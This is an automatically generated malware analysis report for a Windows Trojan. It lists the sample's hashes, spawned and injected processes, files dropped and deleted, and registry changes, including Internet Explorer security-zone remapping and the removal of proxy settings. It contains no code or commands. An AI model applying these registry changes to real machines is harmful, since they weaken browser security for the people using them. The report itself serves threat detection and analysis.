Gen.Variant.Kazy.202598_353f881950

by malwarelabrobot on November 12th, 2015 in Malware Descriptions.

Trojan.Win32.Yoddos.vqa (Kaspersky), Gen:Variant.Kazy.202598 (B) (Emsisoft), Gen:Variant.Kazy.202598 (AdAware), Trojan.Win32.Swrort.3.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


This description has been automatically generated by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 353f881950e6de185c9070fc4b158bd8
SHA1: dd0751b9015b331e55ae36e16921c337cd7e4d7c
SHA256: 74c23477507e1ff67580b3f27a3e06d040a3844db9955facda385be164a48ec9
SSDeep: 98304:eoqowFkRF8IsllQk9Z7hEydAkrpSfJ4O7NuLP:qiFC5JbIB307
Size: 3887109 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2014-09-30 16:54:56
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296

The Trojan injects its code into the following process(es):

Cattle.exe:3444
Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nvsvc32.exe:2544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)

The Trojan deletes the following file(s):

%System%\cmd.exe (0 bytes)

The process ndis500.exe:2916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)

The Trojan deletes the following file(s):

%WinDir%\HpE\sys32\m0gtv9N (0 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (0 bytes)

The process yYJSx.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)

The process appmon.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)

The process ndsqp.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\weblog.log (585 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)

The Trojan deletes the following file(s):

%WinDir%\HpE\sys32\oK455Vp (0 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (0 bytes)

The process tray.exe:3316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\services.exe (3904 bytes)

The process traytp.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)

The process ndislib.exe:3296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes)

The Trojan deletes the following file(s):

%System%\v9pce8W (0 bytes)
%System%\gy17y1D.sys (0 bytes)

Registry activity

The process nvsvc32.exe:2544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\HpE\wow64\rebuild.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\123]
"HomePage" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E F9 A4 E8 40 EC 6D 61 0B 7E 1F AF 80 CE 12 74"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\DProEx]
[HKLM\System\CurrentControlSet\Services\FixTool\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool\Security]
[HKLM\System\CurrentControlSet\Services\DProEx\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool]
[HKLM\System\CurrentControlSet\Services\DProEx\Security]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process hdptlk.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 25 ED 45 9E EA 26 3B 22 EC 5B F9 23 D4 A4 EC"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\HpE\sys32\"

The process Cattle.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 32 30 F8 40 1A 87 6C B9 71 22 D2 A7 1C 4B 3D"

The process ndis500.exe:2916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 15 B6 36 09 56 56 81 4F 4C 6F EB 9D D1 BD 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security-zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\lf3qZKD\Enum]
[HKLM\System\CurrentControlSet\Services\lf3qZKD\Security]
[HKLM\System\CurrentControlSet\Services\lf3qZKD]

The process yYJSx.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 24 F8 5D 45 D7 83 69 E9 0E 49 A2 2F 38 B9 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process appmon.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 B9 63 7A E1 CE 31 05 6D D3 6D 47 51 32 E1 D1"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 1A 04 5F 39 2C 57 66 95 F8 4B 10 42 E7 97 B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security-zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MiniIE.exe:2752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0A 14 13 3E 46 6C 22 03 26 65 B4 F9 35 D6 04"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\HpE\MiniIE.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"

The process ndsqp.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 05 C7 C8 F2 40 05 76 5F 84 40 05 CD 63 B2 3B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security-zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security-zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\n1P2bmf\Security]
[HKLM\System\CurrentControlSet\Services\n1P2bmf]
[HKLM\System\CurrentControlSet\Services\n1P2bmf\Enum]

The process tray.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 1D E8 4C A5 82 0E 16 7C 1A D1 51 96 20 02 BC"

The process traytp.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

